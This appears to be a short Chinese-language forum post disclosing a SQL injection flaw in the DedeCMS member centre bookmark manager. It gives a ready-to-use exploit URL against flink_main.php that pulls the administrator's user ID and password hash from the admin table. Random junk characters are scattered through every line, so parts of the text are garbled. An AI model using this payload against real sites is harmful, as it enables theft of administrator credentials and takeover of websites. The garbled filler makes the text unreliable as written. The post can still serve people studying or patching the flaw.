DedeCMS会员中心SQL注射漏洞( ]# n5 c- l/ D! L! d& ^5 I
需要magic_quotes_gpc = Off1 Z, H' V/ ?. ]1 z& r$ g7 G
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.4 ]; l9 e+ R$ w0 m- |+ H4 p6 ~
2 c8 @. W+ x& X6 I( i
DedeCMS会员中心书签管理SQL注射漏洞. p) a! S3 q4 i1 l7 h/ W& S
成功利用该漏洞可获得管理员密码5 H2 Z/ f0 g2 u. `. S
; \7 w/ ~* a2 X$ W7 O2 j, o会员登录后可以执行SQL语句查询数据库任意内容如管理员密码6 C5 r7 s' x% o1 Z
+ r9 `" a" p. [http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r* D. N& Z# J ]! \
|